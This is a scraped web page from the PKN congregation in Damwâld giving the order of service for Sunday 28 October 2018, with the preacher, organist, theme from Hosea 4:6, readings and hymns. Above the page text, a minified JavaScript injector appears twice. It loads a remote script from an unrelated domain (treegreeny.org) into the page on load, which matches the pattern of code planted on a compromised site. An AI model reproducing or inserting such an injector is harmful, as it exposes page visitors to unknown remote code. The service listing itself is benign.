;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 28 oktober 2018 14:00 uur - PKN Damwâld
zondag 28 oktober 2018
14:00 uur

Kerkdienst zondag 28 oktober 2018 14:00 uur

Thema: Mijn volk komt om doordat het met mij niet vertrouwd is.

Informatie

Voorganger:Ds. S. Boukes
Organist:Jelte Cuperus
Thema:Mijn volk komt om doordat het met mij niet vertrouwd is.
Liturgie
Lied voor de dienst ELB 381
intochtslied : Ps.119:47,49
Stil gebed ,Votum en groet
Lezing van de Tien Geboden Ex. 20:1-17
We zingen: Ps.119:50,52
Gebed
We lezen: Hos.4:1-10 en I Petr.2:9
We zingen: Gez.30:3,4
Preek Hos.4:6a
We zingen: ELB 185:1,2
Dankgebed en voorbeden
Collecte
slotlied: Gez.20:1,2,7
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Bijlagen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Tweede collecte: Kerk